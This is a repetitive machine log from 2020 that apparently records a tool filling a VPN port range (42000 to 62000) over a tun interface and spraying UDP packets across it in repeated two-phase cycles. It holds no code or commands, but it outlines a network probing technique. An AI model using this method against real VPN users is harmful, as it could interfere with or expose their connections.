-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:05:05 -Starting port fill at 2020-09-06 06:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:06:06 -Starting port fill at 2020-09-06 06:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:07:06 -Starting port fill at 2020-09-06 06:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:08:05 -Starting port fill at 2020-09-06 06:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:09:06 -Starting port fill at 2020-09-06 06:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:10:06 -Starting port fill at 2020-09-06 06:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:11:05 -Starting port fill at 2020-09-06 06:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:12:05 -Starting port fill at 2020-09-06 06:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:13:06 -Starting port fill at 2020-09-06 06:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:14:07 -Starting port fill at 2020-09-06 06:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:15:04 -Starting port fill at 2020-09-06 06:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:16:06 -Starting port fill at 2020-09-06 06:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:17:05 -Starting port fill at 2020-09-06 06:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:18:07 -Starting port fill at 2020-09-06 06:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:19:07 -Starting port fill at 2020-09-06 06:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:20:05 -Starting port fill at 2020-09-06 06:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:21:04 -Starting port fill at 2020-09-06 06:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:22:04 -Starting port fill at 2020-09-06 06:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:23:04 -Starting port fill at 2020-09-06 06:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:24:04 -Starting port fill at 2020-09-06 06:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:25:06 -Starting port fill at 2020-09-06 06:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:26:05 -Starting port fill at 2020-09-06 06:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:27:04 -Starting port fill at 2020-09-06 06:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:28:06 -Starting port fill at 2020-09-06 06:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:29:05 -Starting port fill at 2020-09-06 06:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:30:04 -Starting port fill at 2020-09-06 06:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 